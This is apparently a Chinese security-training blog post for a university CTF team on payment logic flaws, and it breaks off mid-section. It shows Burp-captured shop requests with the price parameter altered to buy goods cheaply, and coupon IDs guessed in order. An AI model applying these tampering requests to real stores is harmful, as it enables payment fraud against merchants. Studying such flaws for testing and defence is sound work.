河南省高校联盟战队课件10（支付逻辑漏洞）

本文链接：https://blog.csdn.net/kui576/article/details/124657098

					河南省高校联盟战队课件10（支付逻辑漏洞）

详细视频和总文章：
支付逻辑漏洞
 总文章链接
漏洞描述及测试方法：
实际上这个情况常见的情况有：
负值反冲、正负值对冲、甚至是直接修改数量单价、总价等等。
负值反冲，就是说程序没有校验订单的取值范围，若是使用负值则可以进行支付逻辑利用；
正负值对冲，是指，通过修改订单的数量或者是单价、总价来达到少付钱的目的，但是你的值不能是负值

此次带来的案例，就是我在测试过程遇到的一个，部分课程需要加入购物车后充值购买，于是乎我将单价、总数进行更改，成功的达到了少付款的目的，一元购。

一、数量价格问题

数量价格方面的修改

$[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pw3hPTgc-1652023866890)(D:\software\Typora\courseware\河南高校联盟课件\逻辑漏洞课件\image\image-20220429130001228.png)]$

尝试修改数据 price 把5400改为54

在这里插入图片描述

修改后页面显示为了54（具体情况具体分析）

最终是否成功要试过才知道不清的可以看看前面的那个

二、低价购买高价商品

用BurpSuite抓取相应的数据包
大米测试产品数据包（6000）
在这里插入图片描述数据包如下：
GET /index.php?m=Member&a=gobuy&iscart=0&id=127&name=%E5%A4%A7%E7%B1%B3%E6%B5%8B%E8%AF%95%E4%BA%A7%E5%93%81&qty=1&price=6000&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393218295.jpg

大米手机数据包（5400）
在这里插入图片描述 GET /index.php?m=Member&a=gobuy&iscart=0&id=70&name=%E5%A4%A7%E7%B1%B3%E6%89%8B%E6%9C%BACMS&qty=1&price=5400&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393218295.jpg

改包后
在这里插入图片描述修改后的数据包如下：
GET /index.php?m=Member&a=gobuy&iscart=0&id=127&name=%E5%A4%A7%E7%B1%B3%E6%B5%8B%E8%AF%95%E4%BA%A7%E5%93%81&qty=1&price=5400&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393218295.jpg HTTP/1.1
结果：以5400买到6000的东西（最后结果要真实验证才行）

三、优惠券

重复使用-重放数据包
优惠券猜测并使用

1、优惠券猜测并使用

（1）有优惠券的数据包

goods_sku_list=1%3A1&leavemessage=&use_coupon=121954&integral=0&account_balance=0&pay_type=0&buyer_invoice=&pick_up_id=0&express_company_id=1
goods_sku_list=1%3A1&leavemessage=&use_coupon=121955&integral=0&account_balance=0&pay_type=0&buyer_invoice=&pick_up_id=0&express_company_id=1

（2）没有优惠券的数据包